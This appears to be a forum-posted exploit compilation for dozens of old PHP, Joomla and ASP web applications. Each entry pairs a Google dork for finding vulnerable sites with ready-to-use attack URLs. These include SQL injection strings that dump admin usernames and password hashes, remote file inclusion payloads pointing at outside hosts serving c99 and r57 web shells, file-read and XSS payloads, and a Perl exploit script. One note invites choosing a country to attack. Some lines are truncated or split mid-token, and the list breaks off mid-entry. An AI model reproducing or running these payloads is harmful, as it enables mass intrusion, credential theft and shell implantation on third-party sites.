ScarySpy
Yes, friends, the write-up I present below is my own.
Dork : allinurl: "index2.php?id"
Exploit
1 http://www.target.dk/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adg angskode),4,5,6+from+web1_brugere/*
2 http://www.target.dk/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3+from+web2_brugere/*
3 http://www.target.dk/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3,4,5,6+from+web3_brugere/*
4 http://www.target.dk/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgan gskode),3,4,5,6+from+web4_brugere/*
Powered By: MFH v1 Vulnerability
Dork: "Powered by: MFH v1"
Exploitation options:
STEP 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users
STEP 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info
STEP 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if it's configured)
W.G.C.C Vulnerability
Google Dork : "Web Group Communication Center"
Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Vulnerability
Dork: "powered by zomplog"
Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
Xcart RFI Vulnerability
Google dork : "X-CART. Powerful PHP shopping cart software"
Exploit
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt
Vulnerability in Plugin-Class Based Systems
Google Dork: index.php?loc= or allinurl:.br/index.php?loc=
Exploit:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
Note: In the 2nd dork, in place of .br/ you can write the domain extension of the country you want to attack...
Powered By Linkspile Vulnerability
Dork : Powered By linkspile
Exploit :
http://www.example.com/link.php?cat...,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*
The Realestate ****** Vulnerability
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Passw ord)+from+admin
Calogic Calendars V1.2.2 Vulnerability
Dork : "CaLogic Calendars V1.2.2"
POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}
Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
Powered By PHPizabi Vulnerability
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
Exploit:
http://localhost/izabi/system/cache/pictures/id_shell.php
Example:
http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
AJ Auction 6.2.1 Vulnerability
DORK: inurl:"classifide_ad.php"
Exploit:
http://site.com/classifide_ad.php?i...3,4,CONCAT(user_name,char(58),password),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
Powered By Novus Vulnerability
Dork: "Powered by Novus"
Information server:
http://[novus]/notas.asp?nota_id=1+a...t(int,db_name())
http://[novus]/notas.asp?nota_id=1+a...nt,system_user)
http://[novus]/notas.asp?nota_id=1+a...@servername)--
http://[novus]/notas.asp?nota_id=1+a...t,@@version)--
Com-Mgm Vulnerability
Google Dork: inurl:"com_mgm"
Exploit:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Com-Loudmounth Vulnerability
Dork: inurl:com_loudmounth
Exploit:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Com-Thopper Vulnerability
Google Dork : inurl:com_thopper or inurlhp?option=com_thopper
Exploit:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt
Com-Bsq-Sitestats Vulnerability
Google Dork: inurl:com_bsq_sitestats
Exploit:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt
Com-PeopleBook Vulnerability
Google Dork: inurl:com_peoplebook
Exploit:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt
Joomla Component AstatsPRO Vulnerability
Dork: allinurl: "com_astatspro"
Exploit: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Vulnerability
Dork: Powered by WorkingOnWeb 2.0.1400
Exploit:
http://localhost/events.php?idevent...at(user,0x203a3a20,password),null,0,0,0,0,0,0, 0/**/from/**/mysql.user/*
Powered by cpDynaLinks Vulnerability
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}
print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
On the resulting page, use "view source". The admin nick etc. and the MD5 hashes appear in the first lines.
Maplab-2.2 Vulnerability
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]
Admidio 1.4.8 RFI Vulnerability
Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program...e=../../adm_config/config.php&default_folder=
ezContents CMS Vulnerability
Dork: "ezContents CMS Version 2.0.0"
Exploits:
http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploits 2:
http://site.com/[patch]/printer.php...,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Vulnerability
Dork: "inurlowered by SoftbizScripts" or "Subscribe Newsletter"
Exploit: http://www.ssss.com/hostdirectory/search_result.php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
It is a ****** vulnerability...
ProfileCMS v1.0 Vulnerability
Dork: "Powered By ProfileCMS v1.0" or "Total Generators & Widgets"
Exploit: http://target.com/index.php?app=pro...-1 union select 1,2,concat(id,0x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*
http://target.org/index.php?app=vid...-1 union select 1,concat(id,0x3a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arc...-1 union select 1,concat(id,0x3a,username,0x3 a,password,0x3a,email),3,4,5,6%20from%20users/*
http://target.net/index.php?app=arc...-1 union select 1,load_file(0x2f6574632f70617 3737764),3,4,5,6%20from%20users/*
Com-Rsgallery Vulnerability
Dork: "option=com_rsgallery" or inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
It returns the admin nick etc. and the hashes. It is a vulnerability found in Joomla.
Admin login: /administrator/
Powered By Power Editor Vulnerability
Dork: Powered By Power Editor
Exploit : http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..
Kmitam Vulnerability
Dork: "inurl:/kmitam/"
Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil
Method: Shell
BackLinkSpider Vulnerability
Dork: "Powered By BackLinkSpider" or "inurl:backlinkspider.php"
Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]
http://www.site.com/[backlinkspider...-1 union select 1,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*
PHP-Nuke (Kose_Yazilari) Vulnerability
Google search : ''name Kose_Yazilari op viewarticle artid''
Google search : ''name Kose_Yazilari op printpage artid''
Append to site URL : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Vulnerability
Google search: "inurl:/plugins/wordtube"
Append to site URL : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt
Note: Your own shell address is required for the part after "Html".
Joomla Component EventList Vulnerability
Google search : intext: Event List 0.8 Alpha by schlu.net
Append to site URL : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Vulnerability
Google search : Powered by 6rbScript
Append to site URL
PWD
http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--
USER
http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--
Com-Actualite Vulnerability
Google search : allinurl: "com_actualite"
Append to site URL : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Vulnerability
Google search : inurl:"/com_mtree/"
Append to site URL : http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Vulnerability
Google search: inurl:com_webring
Append to site URL : http://www.site.com/[path]/administ...g.docs.php?component_dir=http://evil_scripts?
Com-Lmo Vulnerability
Google search : "com_lmo"
Append to site URL : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
Com-PonyGallery Vulnerability
Google search : inurl:"index.php?option=com_ponygallery"
Append to site URL : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Vulnerability
Google search : inurl:index.php?option=com_NeoRecruit
Append to site URL : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Vulnerability
Google search : inurl:"/index.php?option=com_rsfiles"
Append to site URL : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Vulnerability
Google search : inurl:index.php?option=com_nicetalk
Append to site URL : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5
Google search : inurl:"com_joomlaradiov5"
Append to site URL : www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?
Com-JoomlaFlashFun Vulnerability
Google search : "com_joomlaflashfun"
Append to site URL : http://xxx.net/2007/administrator/c...laflashfun.php?mosConfig_live_site=[attacker]
Carousel Flash Image Vulnerability
Google search : inurl:"com_jjgallery
Append to site URL : http://[Taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
Com-Mambads Vulnerability
Google search : inurl:com_mambads
Append to site URL :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
Kmita Tell Friend Vulnerability
Dork: "Powered by Kmita Tell Friend" or "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil
Method: Shell
It redirects to the panel.
View-FAQ Vulnerability
Dork: Google : "allinurl:viewfaqs.php?cat="
Exploit:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Days-Booking Vulnerability
Dork: "allinurl:index.php?user=daysbooking"
Exploit: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
Pn-Encyclopedia Vulnerability
Dork: allinurl:index.php?module=pnEncyclopedia
Exploit (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Gamma Scripts Vulnerability
Dork : "BlogMe PHP created by Gamma Scripts"
Exploit : http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--
or
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
ASPapp KnowledgeBase Vulnerability
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
EmagiC CMS.Net v4.0 Vulnerability
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--
vlBook 1.21 ****** Vulnerability
****** Download : http://home.vlab.info/vlbook_1.21.zip
DORK : "Powered by vlBook 1.21"
XSS Address : http://example/?l=" <******>alert('xss')</******>
LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00
PHP-Nuke Siir Vulnerability
DORK 1 : allinurl:"modules.php?name"print
DORK 2 : allinurl:"modules.php?name="Hikaye"
DORK 3: allinurl:"modules.php?name="Fikralar"
DORK 4: allinurl:"modules.php?name="bilgi"
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
Com_JoomlaFlashfun Vulnerability
Dork: "com_joomlaflashfun"
Example:
http://xxx.net/2007/administrator/c...joomlaflashfun.php?mosConfig_live_site=[xxxx]
Powered By The Black Lily 2007 Vulnerability
Dork : "Powered By The Black Lily 2007"
EXPLOIT:
http://victim.com/ar/products.php?class=-1 union select 1,2,password,4,username fro m%20admin/*
or
http://victim.com/en/products.php?class=-1 union select 1,2,3,password,username fro m%20admin/*
JUser Joomla Component 1.0.14 Vulnerability
Dork: inurl:com_juser
Exploit
http://localhost/path/administrator...ctions.php?mosConfig_absolute_path=[evilcode]
Rmsoft GS 2.0 Vulnerability
Dork: intextowered by RMSOFT GS 2.0 or inurl:modules/rmgs/images.php
Exploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
Com-Na-Xxx Vulnerability
DORK 1 : allinurl:"com_na_content"
DORK 2 : allinurl:"com_na_bible"
DORK 3 : allinurl:"com_na_events"
DORK 4 : allinurl:"com_na_content"
DORK 5 : allinurl:"com_na_feedback"
DORK 6 : allinurl:"com_na_mydocs"
DORK 7 : allinurl:"com_na_churchmap"
DORK 8 : allinurl:"com_na_bibleinfo"
DORK 9 : allinurl:"com_na_dbs"
DORK 10 : allinurl:"com_na_udm"
DORK 11 : allinurl:"com_na_qforms"
DORK 12 : allinurl:"com_na_gallery2"
DORK 13 : allinurl:"com_na_publicrss"
DORK 14 : allinurl:"index.php?kwd"
EXPLOIT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Com-Comments Vulnerability
Dork: "Review ******", "Phil Taylor"
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
Portfolio Manager 1.0 Vulnerability
Dork: inurl:"index.php?option=com_portfolio"
Exploit:
http://site.com/index.php?option=com_portfolio&memberId=9&category Id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
Com-Astatspro Vulnerability
Dork: allinurl: "com_astatspro"
PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
On the resulting page, right-click and view source.
<H1>302 Moved</H1>
The document has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.
The MD5 is stored in this part.
Modified By Fully Vulnerability
DORK : allinurl :kb.php?mode=article&k
DORK : "Powered by phpBB © 2001, 2006 phpBB Group" or "Modified by Fully Modded phpBB © 2002, 2006"
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Easy-Clanpage v2.2 Vulnerability
Dork: "Easy-Clanpage v2.2"
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
BM Classifieds Vulnerability
Dork 1 : ''showad.php?listingid=''
Dork 2 : ''pfriendly.php?ad=''
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Porar WebBoart Vulnerability
DorK : '' webboard question.asp QID''
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';
Com-Noticias Vulnerability
DorK : ''com_noticias''
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
ASPapp -links.asp Vulnerability
dork - ''links.asp?CatId''
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
admin login-
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3 F
Modules-Viso Vulnerability
DORKS 1 : allinurl :"modules/viso"
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Bookmarkx ****** Vulnerability
DorK 1 : "2007 BookmarkX ******"
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
or:
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
Com-Profiler Vulnerability
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Com-Jpad Vulnerability
DORK: allinurl:com_jpad
Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
PostSchedule Vulnerability
Google Dork : "PostSchedule ver 1"
Exploit:
index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
joomla SQL Injection(Com-Jokes) Vulnerability
DorK : allinurl: "com_jokes"
EXPLOIT :
index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
Com_Estateagent Vulnerability
Dork : allinurl: "com_estateagent"
EXPLOIT :
index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=xxxx
Com-Fq Vulnerability
DorK: allinurl: "com_fq"
EXPLOIT :
index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*
Com-Mamml Vulnerability
DorK : allinurl: "com_mamml"
EXPLOIT :
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
joomla SQL Injection(com_gallery) Vulnerability
DORK : allinurl: com_gallery "func"
EXPLOIT 1 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*
EXPLOIT 2 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users
Joomla Component Profiler Vulnerability
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Joomla Component Filiale SQL Injection Vulnerability
DORK : inurl:com_filiale
Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
FlippingBook Vulnerability
DORK : inurl:com_flippingbook
Exploit :
/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
Pagenum Vulnerability
DORK : allinurl: " list.php?pagenum"
EXPLOIT
list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(58),login,password),444+from+adm in_login/*
Modules-Tutorials Vulnerability
DORK 1 : allinurl :"/modules/tutorials/"
DORK 2 : allinurl :"/modules/tutorials/"tid
EXPLOIT 1 :
modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*
EXPLOIT 2 :
modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*
Modules-Glossaires Vulnerability
DORK : allinurl: "modules/glossaires"
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
OsCommerce SQL Injection Vulnerability
Google Dork: inurl:"customer_testimonials.php"
Exploit:
http://site.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
Note: It also lists the MD5 hashes of all members, not just the administrator.
Tr ****** News v2.1 Vulnerability
Google Dork: inurl:news.php?mode=voir
Exploit: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
Admin login = /admin
Com-Alberghi Vulnerability
DORK 1 : allinurl: "" detail
DORK 2 : allinurl: "com_alberghi"
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
Powered By Joovideo V1.0 Vulnerability
DORK 1 : allinurl: "com_joovideo" detail
DORK 2 : allinurl: "com_joovideo"
DORK 3 : Powered by joovideo V1.0
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
AllMy-Guests ****** Vulnerability
Vulnerable ******: AllMyGuests
Google Dork: "powered by AllMyGuests" (without the quotes)
Example (Exploit): http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELE CT+1,2,3,concat_ws(0x203a20,user_name,user_passwor d,user_email),5,6,7+from+allmyphp_user+where+user_ id=1--
123FlashChat Vulnerability
DORKS : "123flashchat.php"
